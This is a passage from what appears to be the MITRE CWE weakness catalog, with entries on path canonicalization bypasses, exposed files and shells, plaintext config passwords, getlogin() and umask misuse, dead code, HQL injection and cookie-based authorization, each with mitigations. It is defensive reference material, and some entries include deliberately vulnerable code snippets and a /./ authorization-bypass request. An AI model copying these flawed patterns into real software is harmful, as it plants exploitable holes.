- updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Single Dot Directory - /./ - - - - Certain conditions, such as network failure, will cause a server error message to be displayed. - While error messages in and of themselves are not dangerous, per se, it is what an attacker can glean from them that might cause eventual problems. - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - System Configuration - Recommendations include designing and adding consistent error handling mechanisms which are capable of handling any user input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from being displayed. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak Through Server Error Message - Information Exposure Through Server Error Message - - - - If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection. - For instance, the character strings /./ and / both mean current directory. If /SomeDirectory is a protected directory and an attacker requests /./SomeDirectory, the attacker may be able to gain access to the resource if /./ is not converted to / before the authorization check is performed. - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - URL Inputs should be decoded and canonicalized to the application's current internal representation before being validated and processed for authorization. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples, Description, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Authentication Before Parsing and Canonicalization - - - - The product makes files or directories accessible to unauthorized actors, even though they should not be. - Web servers, FTP servers, and similar servers may store a set of files underneath a "root" directory that is accessible to the server's users. Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any. Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories. - - - - - - - - - Implementation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Operation - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - File or Directory - - - - A10 - Insecure Configuration Management - CWE More Specific - - - FIO15-C - Ensure that file operations are performed in a secure directory - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - Veracode - 2010-09-09 - Suggested OWASP Top Ten mapping - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Errant Files or Directories Accessible - - - - A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server. - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Installation - System Configuration - Remove any Shells accessible under the web root folder and children directories. - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Possible Command Shell (csh) - - - - The ASP.NET application does not use an input validation framework. - - - - - - Indirect - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. - - - - - Architecture and Design - - Use the ASP.NET validation framework to check all program input before it is processed by the application. Example uses of the validation framework include checking to ensure that: - - - Phone number fields contain only valid characters in phone numbers - Boolean values are only "T" or "F" - Free-form strings are of a reasonable length and composition - - - - - - - - SFP24 - Tainted input to command - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences, Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - ASP.NET Misconfiguration: Input Validation - - - - The J2EE application stores a plaintext password in a configuration file. - Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers. - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Do not hardwire passwords into your software. - - - Architecture and Design - Use industry standard libraries to encrypt passwords before storage in configuration files. - - - - - Below is a snippet from a Java properties file in which the LDAP server password is stored in plaintext. - - webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - J2EE Misconfiguration: Password in Configuration File - - - - Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges. - The use of impersonated credentials allows an ASP.NET application to run with either the privileges of the client on whose behalf it is executing or with arbitrary privileges granted in its configuration. - - - - - - Implementation - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Architecture and Design - Use the least privilege principle. - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - ASP.NET Misconfiguration: Identity Impersonation - - - - The application uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values. - The getlogin() function returns a pointer to a string that contains the name of the user associated with the calling process. The function is not reentrant, meaning that if it is called from another process, the contents are not locked out and the value of the string can be changed by another process. This makes it very risky to use because the username can be changed by other processes, so the results of the function cannot be trusted. - - - - - - - - - - Implementation - - - - - Integrity - Access Control - Other - Modify Application Data - Bypass Protection Mechanism - Other - - - - - Architecture and Design - Using names for security purposes is not advised. Names are easy to forge and can have overlapping user IDs, potentially causing confusion or impersonation. - - - Implementation - Use getlogin_r() instead, which is reentrant, meaning that other processes are locked out from changing the username. - - - - - The following code relies on getlogin() to determine whether or not a user is trusted. It is easily subverted. - - pwd = getpwnam(getlogin());if (isTrustedGroup(pwd->pw_gid)) {allow();} else {deny();} - - - - - - Often Misused: Authentication - - - SFP3 - Use of an improper API - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Misused Authentication: getlogin() - - - - A software system that accepts path input in the form of asterisk wildcard ('filedir*') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-0696 - List directories using desired path and "*" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696 - - - CVE-2002-0433 - List files in web server using "*.ext" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433 - - - - - filedir* (asterisk / wildcard) - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Asterisk Wildcard - filedir* - - - - The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod(). - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Read Files or Directories - Modify Files or Directories - Bypass Protection Mechanism - - - - - Implementation - Use umask() with the correct argument. - - - Testing - If you suspect misuse of umask(), you can use grep to spot call instances of umask(). - - - - Some umask() manual pages begin with the false statement: "umask sets the umask to mask & 0777" Although this behavior would better align with the usage of chmod(), where the user provided argument specifies the bits to enable on the specified file, the behavior of umask() is in fact opposite: umask() sets the umask to ~mask & 0777. The documentation goes on to describe the correct usage of umask(): "The umask is used by open() to set initial file permissions on a newly-created file. Specifically, permissions in the umask are turned off from the mode argument to open(2) (so, for example, the common umask default value of 022 results in new files being created with permissions 0666 & ~022 = 0644 = rw-r--r-- in the usual case where the mode is specified as 0666)." - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Other_Notes - - Often Misused: umask() - - - - The software contains dead code, which can never be executed. - Dead code is source code that can never be executed in a running program. The surrounding code makes it impossible for a section of code to ever be executed. - - - - - - Indirect - - - - - - - - Implementation - - - - - Other - Quality Degradation - Dead code that results from code that can never be executed is an indication of problems with the source code that needs to be fixed and is an indication of poor quality. - - - Other - Reduce Maintainability - - - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Binary / Bytecode Quality Analysis - Compare binary / bytecode to application permission manifest - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Automated Monitored Execution - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Permission Manifest Analysis - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source Code Quality Analyzer - - - Cost effective for partial coverage: - - - Warning Flags - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - - - Implementation - Remove dead code before deploying the application. - - - Testing - Use a static analysis tool to spot dead code. - - - - - The condition for the second if statement is impossible to satisfy. It requires that the variables be non-null, while on the only path where s can be assigned a non-null value there is a return statement. - - String s = null;if (b) {s = "Yes";return;} - if (s != null) {Dead();} - - - - In the following class, two private methods call each other, but since neither one is ever invoked from anywhere else, they are both dead code. - - public class DoubleDead {private void doTweedledee() {doTweedledumb();}private void doTweedledumb() {doTweedledee();}public static void main(String[] args) {System.out.println("running DoubleDead");}} - - (In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.) - - - The field named glue is not used in the following class. The author of the class has accidentally put quotes around the field name, transforming it into a string constant. - - public class Dead { - String glue; - public String getGlue() {return "glue";} - } - - - - - - CVE-2014-1266 - chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266 - - - - - MSC07-C - Detect and remove dead code - - - MSC00-PL - Detect and remove dead code - Exact - - - SFP2 - Unused Entities - - - ASCMM-MNT-20 - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Common_Consequences, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash. - Because local variables are allocated on the stack, when a program returns a pointer to a local variable, it is returning a stack address. A subsequent function call is likely to re-use this same stack address, thereby overwriting the value of the pointer, which no longer corresponds to the same variable since a function's stack frame is invalidated when it returns. At best this will cause the value of the pointer to change unexpectedly. In many cases it causes the program to crash the next time the pointer is dereferenced. - - - - - - - - Indirect - - - Primary - - - - - - - - - Implementation - - - - - Availability - Integrity - Confidentiality - Read Memory - Modify Memory - Execute Unauthorized Code or Commands - DoS: Crash, Exit, or Restart - If the returned stack buffer address is dereferenced after the return, then an attacker may be able to modify or read memory, depending on how the address is used. If the address is used for reading, then the address itself may be exposed, or the contents that the address points to. If the address is used for writing, this can lead to a crash and possibly code execution. - - - - - Testing - Use static analysis tools to spot return of the address of a stack variable. - - - - - The following function returns a stack address. - - char* getName() {char name[STR_MAX];fillInName(name);return name;} - - - - - - DCL30-C - Declare objects with appropriate storage durations - CWE More Specific - - - POS34-C - Do not call putenv() with a pointer to an automatic variable as the argument - - - SFP1 - Glitch in computation - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Stack Address Returned - - - - The variable's value is assigned but never used, making it a dead store. - After the assignment, the variable is either assigned another value or goes out of scope. It is likely that the variable is simply vestigial, but it is also possible that the unused variable points out a bug. - - - - - - Indirect - - - - - Unused Variable - - - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - This weakness could be an indication of a bug in the program or a deprecated variable that was not removed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses. - - - - - Implementation - Remove unused variables from the code. - - - - - The following code excerpt assigns to the variable r and then overwrites the value without using it. - - r = getName();r = getNewBuffer(buf); - - - - - - MSC00-C - Compile cleanly at high warning levels - - - MSC01-PL - Detect and remove unused variables - Imprecise - - - SFP2 - Unused Entities - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Common_Consequences, Description, Name, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Alternate_Terms, Name, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Unused Variable - Assignment to Variable without Use ('Unused Variable') - - - - Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Requirements - A non-SQL style database which is not subject to this flaw may be chosen. - - - Architecture and Design - Follow the principle of least privilege when creating user accounts to a SQL database. Users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others' data. - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - Implement SQL strings using prepared statements that bind variables. Prepared statements that do not bind variables can be vulnerable to attack. - - - Implementation - Use vigorous allowlist style checking on any user input that may be used in a SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that have been entered in the database may neglect to escape meta-characters before use. Narrowly define the set of safe characters based on the expected value of the parameter in the request. - - - - - The following code excerpt uses Hibernate's HQL syntax to build a dynamic query that's vulnerable to SQL injection. - - String street = getStreetFromUser();Query query = session.createQuery("from Address a where a.street='" + street + "'"); - - - - - - SFP24 - Tainted input to command - - - - - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The application relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user. - Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Reliance on cookies without detailed validation and integrity checking can allow attackers to bypass authentication, conduct injection attacks such as SQL injection and cross-site scripting, or otherwise modify inputs in unexpected ways. - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - It is dangerous to use cookies to set a user's privileges. The cookie can be manipulated to escalate an attacker's privileges to an administrative level. - - - - - Architecture and Design - Avoid using cookie data for a security-related decision. - - - Implementation - Perform thorough input validation (i.e.: server side validation) on the cookie data if you're going to use it for a security related decision. - - - Architecture and Design - Add integrity checks to detect tampering. - - - Architecture and Design - Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client. - - - - - The following code excerpt reads a value from a browser cookie to determine the role of the user. - - Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("role")) {userRole = c.getValue();}} - - It is easy for an attacker to modify the "role" value found in the locally stored cookie, allowing privilege escalation. - - - - - SFP29 - Faulty endpoint authentication - - - - - - - - - This problem can be primary to many types of weaknesses in web applications. A developer may perform proper validation against URL parameters while assuming that attackers cannot modify cookies. As a result, the program might skip basic input validation to enable cross-site scripting, SQL injection, price tampering, and other attacks.. - - - - Anonymous Tool Vendor (under NDA) - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-07-16 - Critical - Clarified name and description; broadened the definition to include any security-critical operation, not just security decisions, to allow for relationships with injection weaknesses. - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Name, Potential_Mitigations, Relationship_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Use of Cookies - Use of Cookies in Security Decision - - - - The software uses a database table that includes records that should not be accessible to an 